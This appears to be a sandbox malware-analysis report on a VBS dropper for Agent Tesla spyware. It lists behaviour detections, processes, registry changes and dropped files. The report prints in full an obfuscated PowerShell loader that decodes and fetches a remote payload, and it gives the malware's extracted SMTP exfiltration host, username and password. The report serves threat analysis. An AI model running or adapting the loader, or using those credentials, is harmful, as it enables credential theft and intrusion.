File name: 8dfc4da6cddbe96a8eee81460a0352846a686ae31b567742f4f7e19c0a778c46.vbs

Full analysis: https://app.any.run/tasks/a4bd0fad-7846-4629-836a-3eb7570d803d
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as legitimate software on the dedicated website where this malware is sold.

Analysis date: March 19, 2024, 08:52:56
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: evasion, stealer, agenttesla
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5: C76A93BC5DB1B5A8F1E064AB0E51A4D0
SHA1: D9BC68197C03634E12AD62F01C078EB1BC9722BB
SHA256: 8DFC4DA6CDDBE96A8EEE81460A0352846A686AE31B567742F4F7E19C0A778C46
SSDEEP: 3072:sP4yENVBkYr4LhpVXpKnupn8kH3DPbkhZi3eNRMpWOuMvmOfyYqygQXUqIZm+:sP4yENVOY0NpVXpK68kH3DPbkhZi3eND

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Steals credentials from Web Browsers

      • wab.exe (PID: 5672)
    • Actions looks like stealing of personal data

      • wab.exe (PID: 5672)
    • AGENTTESLA has been detected (YARA)

      • wab.exe (PID: 5672)
    • Scans artifacts that could help determine the target

      • wab.exe (PID: 5672)
  • SUSPICIOUS

    • Evaluates numerical expressions in cmd (potential data obfuscation)

      • powershell.exe (PID: 1068)
      • powershell.exe (PID: 2260)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 2532)
      • powershell.exe (PID: 1068)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2532)
    • Checks Windows Trust Settings

      • wab.exe (PID: 5672)
    • Reads security settings of Internet Explorer

      • wab.exe (PID: 5672)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 1068)
      • powershell.exe (PID: 2260)
    • Checks for external IP

      • wab.exe (PID: 5672)
    • Connects to SMTP port

      • wab.exe (PID: 5672)
  • INFO

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 2532)
      • powershell.exe (PID: 1068)
    • Checks supported languages

      • wab.exe (PID: 5672)
    • Reads the computer name

      • wab.exe (PID: 5672)
    • Checks proxy server information

      • wab.exe (PID: 5672)
      • slui.exe (PID: 1404)
    • Creates files or folders in the user directory

      • wab.exe (PID: 5672)
    • Reads Environment values

      • wab.exe (PID: 5672)
    • Reads the machine GUID from the registry

      • wab.exe (PID: 5672)
    • Reads the software policy settings

      • wab.exe (PID: 5672)
      • slui.exe (PID: 1404)
    • Reads Microsoft Office registry keys

      • wab.exe (PID: 5672)

AgentTesla (extracted malware configuration)

(PID) Process: (5672) wab.exe
Protocol: smtp
Host: mail.ardsmmm.com
Port: 587
Username: info@ardsmmm.com
Password: Ard2015**
Total processes: 134
Monitored processes: 8
Malicious processes: 4
Suspicious processes: 0

Behavior graph

Processes shown in the graph (details in the full report): wscript.exe, powershell.exe, conhost.exe, cmd.exe, powershell.exe, cmd.exe, #AGENTTESLA wab.exe, slui.exe

Process information

Each entry gives PID, CMD, Path, Indicators and Parent process (where extraction has fused them, the PID precedes the quoted command line, followed by the image path and then the parent process name), then User, Company, Integrity Level, Description, Exit code, Version and the loaded modules.
1068"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spermagonia sknhedsaabenbaringens Eftermiddagsforestillinger Manipulatory Forureningsbegrebene #>;$everwho=(cmd /c set /A 115^^0);Function Elskerinder ([String]$Programmel){$everwho=[char][int]$everwho;$Tilskudsregelensnvaliditets=$everwho+'ubstring';$Misterming=8;$Nettovgtenes=opholdsomraadet($Programmel);For($Tilskudsregelens=7; $Tilskudsregelens -lt $Nettovgtenes; $Tilskudsregelens+=$Misterming){$Chutists=$Programmel.$Tilskudsregelensnvaliditets.Invoke($Tilskudsregelens, 1);$Simosaurus=$Simosaurus+$Chutists;}$Simosaurus;}function Pitbird ($Pawnor){. ($Oceanologer) ($Pawnor);}function opholdsomraadet ([String]$isopogonous){$Ingenirgerningerne=$isopogonous.Length-1;$Ingenirgerningerne;}$Glacon=Elskerinder 'Uddr geT LgeundrWo,dsycaUdgift,nDentninsRetsp.ifBorteske PanayarAmb,tior.quilibiDigekronAspsteugNond ce ';$Registreringspligter=Elskerinder 'Unme,eshKofusket LignintOdontoipEncinalsHyp.rtr: Disc n/S.marbe/AutoerodVa iolarMicrophi .rydnivInos,oaeRadevor.SubjpongC tholioSub.erroWasteingIndsbnilnamaq.aeCommont.H,rmafrcDistin oHor eummProst.t/Konfek,uarmlngdcScaurie?TranspleVersatix AktieppControvoEsse.serH.ubitst,aknemm=Na.tehidStrychno,appendwOutcre.n FrdigblNonsensoNo emcoaDuoersrdSofacyk&Thinglii S,skatdshopocr=Flaadde1Diddest0AftrdrirJavanesxIdea ios MomiolHBeklageG.ameablyR imondlIn.estmM Exil.n5OrdreekXAktionrj scendedPlac.an8 nnestlGProsodu5ConcussrIshmaelEamorfeiZ UnchemOStip laUPreapprCUd,mmebEregenerrChuggertLeptomo3 LatchltBlokfunZbearpawbRigse.baDebattryAmtsraawOswegoa ';$Oceanologer=Elskerinder 'AsieerfisaltnineUnlingexK.adran ';$Kollaborationers19=Elskerinder 'Superbe$fangedegMissionlTollento Delectb Parabea Flag.il Afrens:VioloneWReallnsi CineplnHjree,sd ApplicsPentanduStudievrHjerterfSynneuse Disponn Kynde,dPensi,neRent,besmisvist1Ba,ales8Skuffem7Halteri Wanting=Fejlmar 
Sk,ldflSInterc.tcounteraSt,eetwrUnwatertRebutta-FlbetssBNonclimiDistingtInvokedsNonradiTStileemrpredestaStumtjenTimefulsPegefinfHvdettee chesterDrab,ma Oldem,-PolytekS PowderoMustineuWeaponsrAarsta.cUnrul eeNationa Ddsstra$SkibstmRSvalegaeTro ersgPo rgaei FingersHedeblgtD lettarfossi,ie aderasr Tegnefi AntirenMonroligGeneralsHerrernpRadonurl remailimopboargPo.phyrt FranskeKume.ierDissert Lidseev-UninvigDaffricae S.bnatsPostcomtWhitewoiUln geun udfrdiaGrapholt Axt,eeiLoutishoE.hvervn Unwebb Lirkep$SalgsdiDVarmeler Inembrv Indstro Regl rgMagtedetSa.gsmae Dop,ngrCrumbiee Flnse.rRetsmed ';Pitbird (Elskerinder 'metodis$Tinta lgVidenskl Fyld.goJoukerybfritureaOverpr.lTribute: AdderiD Scle trDiarrsrv BaltisoMidsommgPlimraatProtoleeAendrinr Nab,breKleenexrTempusf=Sjappeg$SkopudseBroid,rnblo.forvGi arti: StoremaDedicatpcystinup KnappedPartikaaShireestRototilaHelbred ') ;Pitbird (Elskerinder 'OchringISkolarsmPhilosopSifonsfoIversenrSwordgrtenkemnd- NoumenMBirlerjoStrengedAvowabluelfenbelToyscyteApotele Forba.rBTrisylliAfmnstrtKerne.es SucceeTVvninggrCpusanta Fregnen Hallo,s FractafAtomaffepat,uljrPeritom ') ;$Drvogterer=$Drvogterer+'\Mannersome.Jas' ;Pitbird (Elskerinder 'Depreda$Plattelg Te,raslFoozlero U,ocenbInderk a Ma skslmagneti:EarstonK.ommunao.antamkmVaregldmTo,ngleaCapsulinAntechadFadgedmoSlibrigtafsondryIntuitipuni,luseDysodi,n,ymbolisgarialf=Ampulla(SkatteiTFoeltaieforblstsForblomt Hesper-ReshocePvic,neuaSulphurtfosso.ihNimurta Withers$HerlufmD .woundr ormaldvStiletho Artelsgvelsespt TravaleUpte.rsrTandemmeG.untyerS umarb)chimney ') ;while (-not $Kommandotypens) {Pitbird (Elskerinder 'Ka,ksteIdis endf Outv c Amst,up( Idiose$ let anWLek.ikaiAmary,ln Skue pd AphthissentimeuDekadenrMaanedafKnawelseKrak.lsnForbi dd LovligeUudsl.ts Overra1,ppleti8Bluede,7Reumati. 
EnergiJAsselfto NulstibRoycesiSNewspaptMillimeaDrift,gtFabul,reO lsdrm Metrosa-ProfesseMilevidqRetrans Hjhuset$KapsmbaG HydrarlBrnehavaNetvrkscFiksersoAvancemn He,ago)Ko.cent observa{Unfreq SGo,elintMakrop.aDumb,ourNightsptHistori-FreudiaSStrm,evl Hy.roleMillia,e Tel.nepPulingl Hematom1 Arbejd}Prelatie CerouslKapunersGo.lieseexonera{UsurperSBobadiltunassura Udbld rAdiposetHum ede- Kvld rS PythaglTetrammesuasiveeBreddespStandar Frilgge1Sterlet;PinkeyeP MarkariOpvoksetCerningbd sartiiProconfrLaeserudUnringi olsmnd$U ortalKTaljereoSmaavasl EligiblRetninga ordkrib SonsieoSprightrNeighboaUnpaupet RakeryiMacr,pooTeknok nAnesthaeVarmeslr.toikersP.oprie1Ak.ionr9Befordr}instruc ');Pitbird (Elskerinder 'Sprngfa$Husblasg ruktoslPolletao ,ruppebAngorasa PoloidlInven i:FordrinKFindelnoKampkunmGnostikmPreacheaVerbessnKongruedSlerundoImprovit.rbejdsyVig liepusingsieMikr,sknP nplegsguddoms=Enchodo( shellsT karyateInfractsBurgonet Sali y- illionPSquibcraaandendtAflvninhLu inou Vivisek$KnbjninDlurifakrHaabenevKnubango QuadrugUndersktdemursceKodedekrR,foundeUnfraterSelvb.d)Te krat ') ;}Pitbird (Elskerinder 'Demo.al$Rabatg gPodophtlturetb,oGltmercbCavespiaSurreptlDybgang:soveposTT.eomaniWyat,naseudialysBudgetoeProctodnSpindehdGulspureNationa G.atem=Fiske i S etlaGReimposeBesaan,t.hilier-Ba.tardCSpans,roUnoterenShutin,tPredevoeIncremengoofingtmor idi Tronflg$UteroloDBunin hr,rnumrevudstdnioKellysag Grimplt StranseAarstalrOmstni,ePa,riotr Diver ');Pitbird (Elskerinder ' Transs$Op.endigSenatsml ToxogloForblffb SmitstaDooziealOverpro: FasedeBIndertrl TjeneseCurwhibpPlastikhReprimeabredererDeputataInca oc2Baadvrf5Stjrten Hammers=Croupin Seedsme[.vulstiSRddeligyHanebjlsAcharyatLserbr.e Af,ropm Septen.An.amliCFiskehaoP,tagonnCha icovMyoglobeOpdrtterParoxyttNeph od]foroege: inflat: S agteF P.ecedrUnindigoA.ticarmSympatiBDansantaAccelersEfterfleFuruncu6Interpr4 CampinSTriasfot Solaarr BegraviDrk,rmsn Teatreg.olumes( Tudeho$ObrogatTTolvtaliKuarsyns Fl,wsmsTjretscestfrontn Ento odDartleseTetrar 
)Trrelse ');Pitbird (Elskerinder 'Tidsste$ BlattagUpalleylBesvrlioProctopbClasm taP.rtmanlTrouble:PlacardS Cherylk Taga,ayUd.eligdKonkur.eUndigitv PensioiFungivonUan,kuedVoluptuu.ugteneeRestindrpap rus Indel k=Sniffle Ka,itt[ coolamSSikkerhyHoneysssdyppelstIn.hsteeSsk,ndem Resul .M.ngfolTRosenshe De,ertxDressertsmaikra.Nulls,iEAkt.tykn Re,entcDeratizo paasked unctioi Flexibnsammensg,djamen]Afsone.:R.mdisk: PaaligAEnarme.SPrein,rCTimet.rIKen,emrIV lpici.Prosc.lGUdslusnesongishtNonvenaSleverintse.rsskrVerdensiLiteratnBehandlg Dentil(Landska$NemmedeBGedesbylAfhaarieGrisedepLystbaah .chervaAnvenderLetfordaWhitest2Spidser5Samment)Auxamyl ');Pitbird (Elskerinder ' archit$Pileat,gE yoreblPo ychroTankninbKonomiba monochlSismoth:SpisestkStedsbiostandarlFljlsble BombesrAlba itaf.lkeuneTunnelmpGigantoi AlkylodJobskabe Ghettom Somme iRumdumhsUnde.si=Haerene$Tilsta SUntermik.ippopoyBortadodVa,rdieeLserforvTrip asiAktuelln peccabds.angstuRylenbaeHyperadr degnes. NonsilsLeaventuElegancbMadonnasBeruthitMendelsrTaprobaiO egasgnFugtdangOverexc(breadle3trenche3 Scrayf2 ornbls9 Fabrik1 Beewee9legacyk,Sous,he3 Plai e0Afgasni7Fohnsb.6Viscosi9Extrava) immigr ');Pitbird $koleraepidemis;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 1404
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
2260"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Spermagonia sknhedsaabenbaringens Eftermiddagsforestillinger Manipulatory Forureningsbegrebene #>;$everwho=(cmd /c set /A 115^^0);Function Elskerinder ([String]$Programmel){$everwho=[char][int]$everwho;$Tilskudsregelensnvaliditets=$everwho+'ubstring';$Misterming=8;$Nettovgtenes=opholdsomraadet($Programmel);For($Tilskudsregelens=7; $Tilskudsregelens -lt $Nettovgtenes; $Tilskudsregelens+=$Misterming){$Chutists=$Programmel.$Tilskudsregelensnvaliditets.Invoke($Tilskudsregelens, 1);$Simosaurus=$Simosaurus+$Chutists;}$Simosaurus;}function Pitbird ($Pawnor){. ($Oceanologer) ($Pawnor);}function opholdsomraadet ([String]$isopogonous){$Ingenirgerningerne=$isopogonous.Length-1;$Ingenirgerningerne;}$Glacon=Elskerinder 'Uddr geT LgeundrWo,dsycaUdgift,nDentninsRetsp.ifBorteske PanayarAmb,tior.quilibiDigekronAspsteugNond ce ';$Registreringspligter=Elskerinder 'Unme,eshKofusket LignintOdontoipEncinalsHyp.rtr: Disc n/S.marbe/AutoerodVa iolarMicrophi .rydnivInos,oaeRadevor.SubjpongC tholioSub.erroWasteingIndsbnilnamaq.aeCommont.H,rmafrcDistin oHor eummProst.t/Konfek,uarmlngdcScaurie?TranspleVersatix AktieppControvoEsse.serH.ubitst,aknemm=Na.tehidStrychno,appendwOutcre.n FrdigblNonsensoNo emcoaDuoersrdSofacyk&Thinglii S,skatdshopocr=Flaadde1Diddest0AftrdrirJavanesxIdea ios MomiolHBeklageG.ameablyR imondlIn.estmM Exil.n5OrdreekXAktionrj scendedPlac.an8 nnestlGProsodu5ConcussrIshmaelEamorfeiZ UnchemOStip laUPreapprCUd,mmebEregenerrChuggertLeptomo3 LatchltBlokfunZbearpawbRigse.baDebattryAmtsraawOswegoa ';$Oceanologer=Elskerinder 'AsieerfisaltnineUnlingexK.adran ';$Kollaborationers19=Elskerinder 'Superbe$fangedegMissionlTollento Delectb Parabea Flag.il Afrens:VioloneWReallnsi CineplnHjree,sd ApplicsPentanduStudievrHjerterfSynneuse Disponn Kynde,dPensi,neRent,besmisvist1Ba,ales8Skuffem7Halteri Wanting=Fejlmar 
Sk,ldflSInterc.tcounteraSt,eetwrUnwatertRebutta-FlbetssBNonclimiDistingtInvokedsNonradiTStileemrpredestaStumtjenTimefulsPegefinfHvdettee chesterDrab,ma Oldem,-PolytekS PowderoMustineuWeaponsrAarsta.cUnrul eeNationa Ddsstra$SkibstmRSvalegaeTro ersgPo rgaei FingersHedeblgtD lettarfossi,ie aderasr Tegnefi AntirenMonroligGeneralsHerrernpRadonurl remailimopboargPo.phyrt FranskeKume.ierDissert Lidseev-UninvigDaffricae S.bnatsPostcomtWhitewoiUln geun udfrdiaGrapholt Axt,eeiLoutishoE.hvervn Unwebb Lirkep$SalgsdiDVarmeler Inembrv Indstro Regl rgMagtedetSa.gsmae Dop,ngrCrumbiee Flnse.rRetsmed ';Pitbird (Elskerinder 'metodis$Tinta lgVidenskl Fyld.goJoukerybfritureaOverpr.lTribute: AdderiD Scle trDiarrsrv BaltisoMidsommgPlimraatProtoleeAendrinr Nab,breKleenexrTempusf=Sjappeg$SkopudseBroid,rnblo.forvGi arti: StoremaDedicatpcystinup KnappedPartikaaShireestRototilaHelbred ') ;Pitbird (Elskerinder 'OchringISkolarsmPhilosopSifonsfoIversenrSwordgrtenkemnd- NoumenMBirlerjoStrengedAvowabluelfenbelToyscyteApotele Forba.rBTrisylliAfmnstrtKerne.es SucceeTVvninggrCpusanta Fregnen Hallo,s FractafAtomaffepat,uljrPeritom ') ;$Drvogterer=$Drvogterer+'\Mannersome.Jas' ;Pitbird (Elskerinder 'Depreda$Plattelg Te,raslFoozlero U,ocenbInderk a Ma skslmagneti:EarstonK.ommunao.antamkmVaregldmTo,ngleaCapsulinAntechadFadgedmoSlibrigtafsondryIntuitipuni,luseDysodi,n,ymbolisgarialf=Ampulla(SkatteiTFoeltaieforblstsForblomt Hesper-ReshocePvic,neuaSulphurtfosso.ihNimurta Withers$HerlufmD .woundr ormaldvStiletho Artelsgvelsespt TravaleUpte.rsrTandemmeG.untyerS umarb)chimney ') ;while (-not $Kommandotypens) {Pitbird (Elskerinder 'Ka,ksteIdis endf Outv c Amst,up( Idiose$ let anWLek.ikaiAmary,ln Skue pd AphthissentimeuDekadenrMaanedafKnawelseKrak.lsnForbi dd LovligeUudsl.ts Overra1,ppleti8Bluede,7Reumati. 
EnergiJAsselfto NulstibRoycesiSNewspaptMillimeaDrift,gtFabul,reO lsdrm Metrosa-ProfesseMilevidqRetrans Hjhuset$KapsmbaG HydrarlBrnehavaNetvrkscFiksersoAvancemn He,ago)Ko.cent observa{Unfreq SGo,elintMakrop.aDumb,ourNightsptHistori-FreudiaSStrm,evl Hy.roleMillia,e Tel.nepPulingl Hematom1 Arbejd}Prelatie CerouslKapunersGo.lieseexonera{UsurperSBobadiltunassura Udbld rAdiposetHum ede- Kvld rS PythaglTetrammesuasiveeBreddespStandar Frilgge1Sterlet;PinkeyeP MarkariOpvoksetCerningbd sartiiProconfrLaeserudUnringi olsmnd$U ortalKTaljereoSmaavasl EligiblRetninga ordkrib SonsieoSprightrNeighboaUnpaupet RakeryiMacr,pooTeknok nAnesthaeVarmeslr.toikersP.oprie1Ak.ionr9Befordr}instruc ');Pitbird (Elskerinder 'Sprngfa$Husblasg ruktoslPolletao ,ruppebAngorasa PoloidlInven i:FordrinKFindelnoKampkunmGnostikmPreacheaVerbessnKongruedSlerundoImprovit.rbejdsyVig liepusingsieMikr,sknP nplegsguddoms=Enchodo( shellsT karyateInfractsBurgonet Sali y- illionPSquibcraaandendtAflvninhLu inou Vivisek$KnbjninDlurifakrHaabenevKnubango QuadrugUndersktdemursceKodedekrR,foundeUnfraterSelvb.d)Te krat ') ;}Pitbird (Elskerinder 'Demo.al$Rabatg gPodophtlturetb,oGltmercbCavespiaSurreptlDybgang:soveposTT.eomaniWyat,naseudialysBudgetoeProctodnSpindehdGulspureNationa G.atem=Fiske i S etlaGReimposeBesaan,t.hilier-Ba.tardCSpans,roUnoterenShutin,tPredevoeIncremengoofingtmor idi Tronflg$UteroloDBunin hr,rnumrevudstdnioKellysag Grimplt StranseAarstalrOmstni,ePa,riotr Diver ');Pitbird (Elskerinder ' Transs$Op.endigSenatsml ToxogloForblffb SmitstaDooziealOverpro: FasedeBIndertrl TjeneseCurwhibpPlastikhReprimeabredererDeputataInca oc2Baadvrf5Stjrten Hammers=Croupin Seedsme[.vulstiSRddeligyHanebjlsAcharyatLserbr.e Af,ropm Septen.An.amliCFiskehaoP,tagonnCha icovMyoglobeOpdrtterParoxyttNeph od]foroege: inflat: S agteF P.ecedrUnindigoA.ticarmSympatiBDansantaAccelersEfterfleFuruncu6Interpr4 CampinSTriasfot Solaarr BegraviDrk,rmsn Teatreg.olumes( Tudeho$ObrogatTTolvtaliKuarsyns Fl,wsmsTjretscestfrontn Ento odDartleseTetrar 
)Trrelse ');Pitbird (Elskerinder 'Tidsste$ BlattagUpalleylBesvrlioProctopbClasm taP.rtmanlTrouble:PlacardS Cherylk Taga,ayUd.eligdKonkur.eUndigitv PensioiFungivonUan,kuedVoluptuu.ugteneeRestindrpap rus Indel k=Sniffle Ka,itt[ coolamSSikkerhyHoneysssdyppelstIn.hsteeSsk,ndem Resul .M.ngfolTRosenshe De,ertxDressertsmaikra.Nulls,iEAkt.tykn Re,entcDeratizo paasked unctioi Flexibnsammensg,djamen]Afsone.:R.mdisk: PaaligAEnarme.SPrein,rCTimet.rIKen,emrIV lpici.Prosc.lGUdslusnesongishtNonvenaSleverintse.rsskrVerdensiLiteratnBehandlg Dentil(Landska$NemmedeBGedesbylAfhaarieGrisedepLystbaah .chervaAnvenderLetfordaWhitest2Spidser5Samment)Auxamyl ');Pitbird (Elskerinder ' archit$Pileat,gE yoreblPo ychroTankninbKonomiba monochlSismoth:SpisestkStedsbiostandarlFljlsble BombesrAlba itaf.lkeuneTunnelmpGigantoi AlkylodJobskabe Ghettom Somme iRumdumhsUnde.si=Haerene$Tilsta SUntermik.ippopoyBortadodVa,rdieeLserforvTrip asiAktuelln peccabds.angstuRylenbaeHyperadr degnes. NonsilsLeaventuElegancbMadonnasBeruthitMendelsrTaprobaiO egasgnFugtdangOverexc(breadle3trenche3 Scrayf2 ornbls9 Fabrik1 Beewee9legacyk,Sous,he3 Plai e0Afgasni7Fohnsb.6Viscosi9Extrava) immigr ');Pitbird $koleraepidemis;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 2532
CMD: "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\8dfc4da6cddbe96a8eee81460a0352846a686ae31b567742f4f7e19c0a778c46.vbs"
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4076
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5672
CMD: "C:\Program Files (x86)\windows mail\wab.exe"
Path: C:\Program Files (x86)\Windows Mail\wab.exe
Indicators: #AGENTTESLA
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
AgentTesla (configuration extracted from this process)
(PID) Process: (5672) wab.exe
Protocol: smtp
Host: mail.ardsmmm.com
Port: 587
Username: info@ardsmmm.com
Password: Ard2015**
PID: 6044
CMD: "C:\WINDOWS\system32\cmd.exe" /c set /A 115^^0
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
PID: 6680
CMD: "C:\WINDOWS\system32\cmd.exe" /c set /A 115^^0
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.746 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
Total events: 17 735
Read events: 17 688
Write events: 47
Delete events: 0

Modification events

All entries below write to the key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap.

(PID) Process: (2532) wscript.exe | Operation: write | Name: ProxyBypass | Value: 1
(PID) Process: (2532) wscript.exe | Operation: write | Name: IntranetName | Value: 1
(PID) Process: (2532) wscript.exe | Operation: write | Name: UNCAsIntranet | Value: 1
(PID) Process: (2532) wscript.exe | Operation: write | Name: AutoDetect | Value: 0
(PID) Process: (1068) powershell.exe | Operation: write | Name: ProxyBypass | Value: 1
(PID) Process: (1068) powershell.exe | Operation: write | Name: IntranetName | Value: 1
(PID) Process: (1068) powershell.exe | Operation: write | Name: UNCAsIntranet | Value: 1
(PID) Process: (1068) powershell.exe | Operation: write | Name: AutoDetect | Value: 0
(PID) Process: (2260) powershell.exe | Operation: write | Name: ProxyBypass | Value: 1
(PID) Process: (2260) powershell.exe | Operation: write | Name: IntranetName | Value: 1
Executable files: 0
Suspicious files: 7
Text files: 5
Unknown types: 3

Dropped files

Columns: PID | Process | Filename | Type, followed by the file's MD5 and SHA256.

2260 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary
MD5: C76555487F3760099709FD7487BFB259
SHA256: AD8BEE1720C0631AAD060FC8CDC56D9B6AB83541731C816EA3D0AA2D073CE861
2260 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xgleqfvy.sbo.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1068 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_c43hbwvk.kqy.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2260 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ciayleg2.f4h.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5672 | wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | binary
MD5: DDC63EB9D86E16BD737FE22E2A2F6CA1
SHA256: 93BDF3D760D20289F9FAB5F2162F9E068A7E065F773D0E152CC2021EEB813DB3
5672 | wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_2517452929F0CAF6449847D40B7C277D | binary
MD5: DD99E4375181D974A045FE71CAC19794
SHA256: CD22886855D32E49257374F9AE9E9E50EEC83A89513602A319A77583D1B44625
1068 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
MD5: 7DFE7EF903F79BE9179FFE163DE9B0C6
SHA256: CBC1B4ECC306CA565C2060132C6BCBEFF542E09636FDF9F7860A698E03F15251
1068 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | text
MD5: 51A116C305687D5E885627C8EFB63E66
SHA256: B0A8315E7D574B1A0579FBF0D5DE80B9A12946A56DE21B0721B7BF00A16B486C
5672 | wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | binary
